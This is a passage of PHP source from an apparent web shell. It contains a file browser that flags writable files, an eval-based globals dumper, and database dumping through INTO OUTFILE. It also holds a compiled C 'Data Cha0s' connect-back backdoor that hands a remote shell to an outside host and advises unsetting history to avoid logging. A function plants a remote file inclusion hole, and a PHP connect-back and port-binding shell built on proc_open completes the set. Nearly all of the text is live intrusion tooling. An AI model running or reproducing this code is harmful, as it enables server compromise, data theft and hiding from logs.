				$write = fwrite($fh, $cont);
				fclose($fh);
			}
		}
		$dataout .= highlight_file($dest, 1);
	} else {
		$dataout .= "unable to open <b>$dest</b>.\n";
	}
	return $dataout;
}
function show_file($source) {
	$dataout = "";
	if(file_exists($source)) {
		$fh = fopen($source, "r");
		if(!$fh) {
			$dataout .= "unable to open <b>$source</b>.\n";
		} else {
			$read = fread($fh, filesize($source));
			fclose($fh);
			if(!empty($read)) $read = str_replace(">", "&gt;", str_replace("<", "&lt;", $read));
			$dataout .= $read;
		}
	} else {
		$dataout .= "unable to open <b>$source</b>.\n";
	}
	return $dataout;
}
function snoopy($chdir){
	$tmpOut = "";
	global $is_file,$is_dir,$is_w_dir,$is_w_file;
	$fh = opendir("$chdir");
	if($fh!="") {
		while (false !== ($filename = readdir($fh)) ) {
			$FN = $chdir."/".$filename;
			if(@is_file($FN)) $is_file[] = $filename;
			if(@is_dir($FN))  $is_dir[] = $filename;
			if(@is_writable($FN) && @is_dir($filename))  $is_w_dir[] = $filename;
			if(@is_writable($FN) && @is_file($filename)) $is_w_file[] = $filename;
		}
		$tmpOut .=  "<table border=1 cellspacing=1 cellpadding=0><tr>";
		$tmpOut .= echo_files($is_file,  "all files");
		$tmpOut .= echo_files($is_dir,   "only dirs");
		$tmpOut .= echo_files($is_w_dir, "writable dirs");
		$tmpOut .= echo_files($is_w_file,"writable files");
		$tmpOut .= "</tr></table>";
	} else {
		$tmpOut .= "Permission denied.";
	}
	closedir($fh);
	return $tmpOut;
}

function echo_files($arr,$txt){
	$tmpOutMF = "";
	global $chdir,$MyLoc,$SREQ;
	$tmpOutMF .= "<td valign=top>";
	$tmpOutMF .= "<b><font size=2 face=arial>$txt</b> <br><br>";
	if(count($arr) > 0) {
		foreach($arr as $key => $file) {
			$FN = $chdir."/".$file;
			$owner = fileowner($FN);
			$perms = substr(sprintf("%o",fileperms($FN)),-3);
			if(@is_writable($FN) && @is_dir($FN))  $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
			elseif(@is_writable($FN) && @is_file($FN)) $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a> </font><br>";
			elseif(@is_file($FN)) $tmpOutMF .=  "<font color=green>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a></font><br>"; 
			elseif(@is_dir($FN))  $tmpOutMF .=  "<font color=blue>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
		}
	}
    $tmpOutMF .=  "</td>";
    return $tmpOutMF;
}
function print_globals($v) {
	global $a;
	echo "<blockquote>\n";
	$q= "while(list(\$key,\$val) = each($".$v. ") ) { ".
	" echo \"<b>\$key</b>=>\$val.<br>\"; ".
	" if(( is_array(\$val)) && (\$key != \"GLOBALS\")) {".
	" @print_globals( \$v.\"[\".\$key.\"]\" );".
	"}}";
	eval($q);
	echo "</blockquote>\n";
}
######################################################################
# connect back shell function
######################################################################

function connect_back($tmp_dir, $compiler, $host, $port) {
    $shell = "#include <stdio.h>\n" .
             "#include <sys/socket.h>\n" .
             "#include <netinet/in.h>\n" .
             "#include <arpa/inet.h>\n" .
             "#include <netdb.h>\n" .
             "int main(int argc, char **argv) {\n" .
             "  char *host;\n" .
             "  int port = 80;\n" .
             "  int f;\n" .
             "  int l;\n" .
             "  int sock;\n" .
             "  struct in_addr ia;\n" .
             "  struct sockaddr_in sin, from;\n" .
             "  struct hostent *he;\n" .
             "  char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
             "                \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
             "                \"For More Reliable Shell.\\n\"\n" .
             "                \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
             "                \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
             "  printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
             "  if (argc < 2 || argc > 3) {\n" .
             "    printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
             "    return 1;\n" .
             "  }\n" .
             "  printf(\"[*] Dumping Arguments\\n\");\n" .
             "  l = strlen(argv[1]);\n" .
             "  if (l <= 0) {\n" .
             "    printf(\"[-] Invalid Host Name\\n\");\n" .
             "    return 1;\n" .
             "  }\n" .
             "  if (!(host = (char *) malloc(l))) {\n" .
             "    printf(\"[-] Unable to Allocate Memory\\n\");\n" .
             "    return 1;\n" .
             "  }\n" .
             "  strncpy(host, argv[1], l);\n" .
             "  if (argc == 3) {\n" .
             "    port = atoi(argv[2]);\n" .
             "    if (port <= 0 || port > 65535) {\n" .
             "      printf(\"[-] Invalid Port Number\\n\");\n" .
             "      return 1;\n" .
             "    }\n" .
             "  }\n" .
             "  printf(\"[*] Resolving Host Name\\n\");\n" .
             "  he = gethostbyname(host);\n" .
             "  if (he) {\n" .
             "    memcpy(&ia.s_addr, he->h_addr, 4);\n" .
             "  } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
             "    printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
             "    return 1;\n" .
             "  }\n" .
             "  sin.sin_family = PF_INET;\n" .
             "  sin.sin_addr.s_addr = ia.s_addr;\n" .
             "  sin.sin_port = htons(port);\n" .
             "  printf(\"[*] Connecting...\\n\");\n" .
             "  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
             "    printf(\"[-] Socket Error\\n\");\n" .
             "    return 1;\n" .
             "  }\n" .
             "  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
             "    printf(\"[-] Unable to Connect\\n\");\n" .
             "    return 1;\n" .
             "  }\n" .
             "  printf(\"[*] Spawning Shell\\n\");\n" .
             "  f = fork( );\n" .
             "  if (f < 0) {\n" .
             "    printf(\"[-] Unable to Fork\\n\");\n" .
             "    return 1;\n" .
             "  } else if (!f) {\n" .
             "    write(sock, msg, sizeof(msg));\n" .
             "    dup2(sock, 0);\n" .
             "    dup2(sock, 1);\n" .
             "    dup2(sock, 2);\n" .
             "    execl(\"/bin/sh\", \"shell\", NULL);\n" .
             "    close(sock);\n" .
             "    return 0;\n" .
             "  }\n" .
             "  printf(\"[*] Detached\\n\\n\");\n" .
             "  return 0;\n" .
             "}\n";
    $fbname = $tmp_dir . "/cbs";
	$fp = fopen($fbname . ".c", "w");
	$write = fwrite($fp, $shell);
	fclose($fp);
	if(!empty($write)) {
		$command = $compiler . " -o " . $fbname . " " . $fbname . ".c";
		$execM = test_cmd_shell();
		if($execM > 0) {
			$rtval = Mexec($command, $execM);
			$command = $fbname . " " . $host . " " . $port;
			$rtval .= Mexec($command, $execM);
			return "<pre>" . $rtval . "</pre>";
		} else {
			return "<b>ERROR! No EXEC Avilable!</b>";
		}
		
	} else {
		return "<b>ERROR! Writing data!</b>";
	}
}

######################################################################
# drop mini inc hole
######################################################################
function dropminiinc($location) {
	$Scode = "<?php\n".
		"if (phpversion() <= '4.1.0') \$vars = array_merge(\$HTTP_GET_VARS, \$HTTP_POST_VARS);\n".
		"else \$vars = \$_REQUEST;\n".
		"include(\$vars[inc]);\n".
		"?>\n";
	$fp = fopen($location, "w");
	$write = fwrite($fp, $Scode);
	if(!empty($write)) return "<b>$location</b> copied\n";
	else return "<b>ERROR! Not copied!</b>";
}

######################################################################
# db functions
# unchanged from dans code
######################################################################
function prep_rows($myresult) {
	$dataout = "<table>\n";
	$num_fields = mysql_num_fields($myresult);
	$dataout .= "<tr border=1>\n";
	for($i=0; $i<$num_fields; $i++) $dataout .= "<td>" . mysql_field_name($myresult, $i) . "</td>";
	$dataout .= "</tr>\n";
	while ($line = mysql_fetch_array($myresult, MYSQL_ASSOC)) {
		$dataout .= "<tr>\n";
		foreach($line as $colvalue) {
			$dataout .= "<td>$colvalue</td>\n";
		}
	$dataout .= "</tr>\n";
	}
	$dataout .= "</table>\n";
	return $dataout;
}

function dump_rows($myhost, $myuser, $mypass, $mydb, $mytable, $mydump) {
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	mysql_select_db($mydb); //  or return "Could not select database";
	$query = "SELECT * FROM ".$mytable." INTO OUTFILE \"".$mydump."\";";
	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
	mysql_free_result($result);
	mysql_close($link);
	return "Hopefully dumped!";
}

function dump_query($myhost, $myuser, $mypass, $mydb, $mysql, $mydump) {
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	mysql_select_db($mydb); //  or return "Could not select database";
	$query = $mysql." INTO OUTFILE \"".$mydump."\";";
	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
	mysql_free_result($result);
	mysql_close($link);
	return "Hopefully dumped!";
}

function display_query($myhost, $myuser, $mypass, $mydb, $mysql) {
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	mysql_select_db($mydb); //  or return "Could not select database";
	$query = $mysql;
	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
	$dataouted = prep_rows($result);
	mysql_free_result($result);
	mysql_close($link);
	return($dataouted);
}

function display_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	mysql_select_db($mydb); //  or return "Could not select database";
	$query = "SELECT * FROM ".$mytable;
	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
	$dataouted = prep_rows($result);
	mysql_free_result($result);
	mysql_close($link);
	return($dataouted);
}

function display_tables($myhost, $myuser, $mypass, $mydb) {
	global $MyLoc,$SREQ;
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	$result = mysql_list_tables($mydb);
	if (!$result) {
		return "DB Error, could not list tables";
	}
	$dataout = "<table>\n";
	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
		$dataout .= "<tr>\n";
		foreach ($line as $col_value) {
			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$mydb&incdbtable=$col_value'>$col_value</a></td>\n";
		}
	$dataout .= "</tr>\n";
	}
	$dataout .= "</table>\n";
	mysql_free_result($result);
	mysql_close($link);
	return($dataout);
}

function display_dbs($myhost, $myuser, $mypass) {
	global $MyLoc,$SREQ;
	$link = mysql_connect($myhost, $myuser, $mypass);
	$result = mysql_list_dbs($link);
	if (!$result) {
		return "DB Error, could not list databases";
	}
	$dataout = "<table>\n";
	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
		$dataout .= "<tr>\n";
		foreach ($line as $col_value) {
			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$col_value'>$col_value</a></td>\n";
		}
	$dataout .= "</tr>\n";
	}
	$dataout .= "</table>\n";
	mysql_free_result($result);
	mysql_close($link);
	return($dataout);
}

function Odisplay_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	$query = "SELECT * FROM ".$mytable;
	$result = odbc_exec($link, $query); // or return "Query failed: ".mysql_error();
	$dataout = "<table>\n";
	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
		$dataout = $dataout . "<tr>\n";
		foreach($line as $colvalue) {
			$dataout = $dataout . "<td>$colvalue</td>\n";
		}
	$dataout = $dataout . "</tr>\n";
	}
	$dataout = $dataout . "</table>\n";
	return($dataout);
}

function Odisplay_tables($myhost, $myuser, $mypass) {
	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	$result = odbc_tables($link);
	if (!$result) {
		return "DB Error, could not list tables";
	}
	$dataout = "<table>\n";
	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
		if(odbc_result($line, 4) == "TABLE") {
			$dataout = $dataout . "<tr>\n";
			$dataout = $dataout . "<td>" . odbc_result($tablelist, 3) ."</td>\n"; 
		}
		$dataout = $dataout . "</tr>\n";
	}
	$dataout = $dataout . "</table>\n";
	return($dataout);
}

######################################################################
# Dan's Network function Wrappers
# Initial use inside this script, need to handle the error data 
# differently to get it included in the base 64 output!
######################################################################

function DB_NET_GET_SOCKET_PROTOCOL($prot) {
	switch($prot) {
		case "udp":
			$protocol = SOL_UDP;
			$socktype = SOCK_DGRAM;
		break;
		case "tcp":
		default:
			$protocol = SOL_TCP;
			$socktype = SOCK_STREAM;
		break;
	}
	return(array($protocol, $socktype));
}

function DB_NET_CONNECT($hostname, $port=80, $prot="tcp") {
	$address = gethostbyname($hostname);
	list($protocol, $socktype) = DB_NET_GET_SOCKET_PROTOCOL($prot);
	switch($prot) {
		case "udp":
			$protocol = SOL_UDP;
			$socktype = SOCK_DGRAM;
		break;
		case "tcp":
		default:
			$protocol = SOL_TCP;
			$socktype = SOCK_STREAM;
		break;
	}
	$socket = socket_create(AF_INET, $socktype, $protocol);
	if ($socket < 0) {
		echo "socket_create() failed: reason: " . socket_strerror($socket) . "\n";
	}

	$result = socket_connect($socket, $address, $port);
	if ($result < 0) {
		echo "socket_connect() failed.\nReason: ($result) " . socket_strerror($result) . "\n";
	}
	return $socket;
}

function DB_NET_LISTEN($address, $port) {
	if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
		echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
		return(-1);
	}

	if (($ret = socket_bind($sock, $address, $port)) < 0) {
		echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
		return(-2);
	}

	if (($ret = socket_listen($sock, 5)) < 0) {
		echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
		return(-3);
	}

	return($sock);
}

######################################################################
# Dan's PHP Connect Back / Port Binding Shell!
# Yes that right a REAL shell!
# Now I had this idea for ages, finally coded it 6 months ago, and 
# it's never really been used.
# Not really brain science but when there are many examples of PHP 
# sockets + proc_open it's a little harder.
######################################################################

function DB_Shell($type, $shell, $port, $host = "0.0.0.0") {
	if($type == "cb" && $host != "0.0.0.0") {
		$procsock = DB_NET_CONNECT($host, $port, "tcp");
	} elseif ($type == "pb") {
		$lsock = DB_NET_LISTEN($host, $port);
		if (($procsock = socket_accept($lsock)) < 0) {
    		return "socket_accept() failed: reason: " . socket_strerror($procsock) . "\n";
    	}
	} else {
		return "Error no connection details specified!";
	}

	set_time_limit(9000);
	$descriptorspec = array(
		0 => array("pipe", "r"),
		1 => array("pipe", "w"),
		2 => array("pipe", "w")
	);
	$process = proc_open($shell, $descriptorspec, $pipes);
	if (is_resource($process)) {
		$tmp_loop = 1;
		do {
			$tmp_array = array($procsock);
			$num_changed_sockets = socket_select($tmp_array, $write = NULL, $except = NULL, 0);
			if ($num_changed_sockets === false) {
				$tmp_loop = 0;
			} else if ($num_changed_sockets > 0) {
				foreach($tmp_array as $k => $v) {
					if($v == $procsock) {
						if(socket_last_error($procsock) > 0) $tmp_loop = 0;
						if($tmp_loop == 1 && false == ($buf = socket_read($procsock, 2048, PHP_NORMAL_READ))) $tmp_loop = 0;
						fwrite($pipes[0], $buf);
					}
				}
			}
			$tmp_arrayS = array($pipes[1], $pipes[2]);
			$num_changed_streams = stream_select($tmp_arrayS, $write = NULL, $except = NULL, 0);
			if ($num_changed_streams === FALSE) {
				$tmp_loop = 0;
			} else if ($num_changed_streams > 0) {
				foreach($tmp_arrayS as $k => $v) {
					if($tmp_loop == 1 && false == ($buf = fread($v, 2048))) $tmp_loop = 0;
					socket_write($procsock, $buf, strlen($buf));
				}
			}
		} while($tmp_loop == 1);
	} else {
		return "Error executing shell " . $shell;
	}
}

?>